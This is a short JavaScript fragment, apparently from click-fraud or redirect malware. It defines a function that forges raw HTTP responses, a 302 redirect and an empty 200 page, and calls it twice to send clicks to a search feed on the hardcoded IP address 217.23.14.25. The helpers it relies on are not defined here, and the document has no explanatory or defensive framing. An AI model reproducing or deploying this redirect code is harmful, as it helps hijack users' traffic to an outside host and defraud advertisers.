function FormatRedirect(clickurl, ref, url, realurl)
{
var s = crc32(realurl);
var date = new Date();
var time = date.getTime();
SetString(s, time);
AddPage(clickurl, 2, null, 0, false, "HTTP/1.1 302\r\nLocation: "+ref+"\r\n\r\n");
var body = "";
AddPage(null, 0, ref, 2, false, "HTTP/1.1 200\r\nConnection: close\r\nContent-Length: " + body.length + "\r\n\r\n" + body);
}FormatRedirect(decodeURIComponent(""), "http://217.23.14.25/feed/search.php?q=", "http://217.23.14.25/root", "http://217.23.14.25/root");FormatRedirect(decodeURIComponent(""), "http://217.23.14.25/feed/search.php?q=", "http://217.23.14.25/root", "http://217.23.14.25/root");